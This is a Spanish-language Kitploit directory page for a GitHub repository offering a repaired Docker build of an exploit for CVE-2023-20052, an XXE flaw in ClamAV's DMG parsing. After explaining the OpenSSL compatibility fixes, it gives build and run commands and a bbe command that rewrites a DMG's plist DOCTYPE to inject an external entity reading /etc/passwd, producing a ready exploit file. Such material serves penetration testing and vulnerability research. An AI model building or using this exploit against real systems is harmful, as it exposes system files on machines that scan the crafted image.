Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2023-20052 | Kitploit
Herramientas/GitHubGitHub/mohitsinghpapola/cve-2023-20052
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebFuzzingAnálisis de MalwareAnálisis de Binarios
GitHubmohitsinghpapola/cve-2023-20052

CVE-2023-20052

Ver Repositorio
hace 6 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2023-20052 Exploit - Compilación Corregida

Compilación de Docker corregida para CVE-2023-20052 (vulnerabilidad XXE de ClamAV) que realmente compila.

Lo Que Estaba Roto

El exploit original no compila en sistemas modernos:

  • ❌ Errores de compatibilidad con OpenSSL 3.0
  • ❌ Errores de tipo incompleto de la estructura HMAC_CTX
  • ❌ Errores de declaración implícita de funciones
  • ❌ La compilación falla en dmg/filevault.c

Lo Que Corregí

  1. Imagen base cambiada: Ubuntu 22.04 → Ubuntu 18.04
  2. Versión de OpenSSL corregida: Usa libssl1.0-dev (OpenSSL 1.0)
  3. Modo no interactivo añadido: Evita las preguntas de la compilación
  4. Dockerfile funcional: Realmente compila con éxito

Por Qué Funciona

libdmg-hfsplus usa funciones obsoletas de OpenSSL 1.0:

  • HMAC_CTX_init() / HMAC_CTX_cleanup() (eliminadas en OpenSSL 1.1+)
  • Uso directo de la estructura HMAC_CTX (opaca en OpenSSL 1.1+)

Ubuntu 18.04 es la última LTS con soporte para OpenSSL 1.0.

Compilación y Uso

root@kitploit:~
# Build (takes ~3-5 minutes)
docker build -t cve-2023-20052 .

# Run
docker run -v $(pwd):/exploit -it cve-2023-20052 bash

# Create exploit DMG
genisoimage -D -V "exploit" -no-pad -r -apple -o test.img .
dmg dmg test.img test.dmg
bbe -e 's|<!DOCTYPE plist PUBLIC "-//Apple Computer//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">|<!DOCTYPE plist [<!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>|' -e 's/blkx/&xxe;/' test.dmg -o exploit.dmg

Créditos

  • Exploit original: nokn0wthing/CVE-2023-20052
  • Corregido por: https://reapsec.com

Compilación de Docker corregida para CVE-2023-20052 (ClamAV XXE) - Resuelve los errores de compilación de OpenSSL 3.0. Usa Ubuntu 18.04 con OpenSSL 1.0 para compatibilidad con libdmg-hfsplus

Descargar herramienta